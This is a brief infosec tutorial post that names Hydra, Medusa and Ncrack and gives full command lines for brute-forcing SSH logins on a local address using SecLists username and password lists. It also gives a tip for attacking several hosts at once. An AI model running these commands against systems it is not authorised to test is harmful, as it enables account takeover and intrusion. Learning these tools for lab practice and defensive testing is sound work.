InfoSec

Three tools for bruteforcing

Hydra, Ncrack and Medusa (although ncrack is no longer being actively developed and supported):

hydra -L /usr/share/seclists/Usernames/top_shortlist.txt -P /usr/share/seclists/Passwords/top_shortlist.txt ssh://192.168.1.5

medusa -h 192.168.1.5 -M ssh -U /usr/share/seclists/Usernames/top_shortlist.txt -P /usr/share/seclists/Passwords/top_shortlist.txt

ncrack -vv -U /usr/share/seclists/Usernames/top_shortlist.txt -P /usr/share/seclists/Passwords/top_shortlist.txt 192.168.1.5 -p ssh

Please make sure that you have a good word and password list for this exercise. It might take extremely long, but if you add the -T/-t flag to medusa or hydra you can scan multiple hosts at the same time.

Leave a comment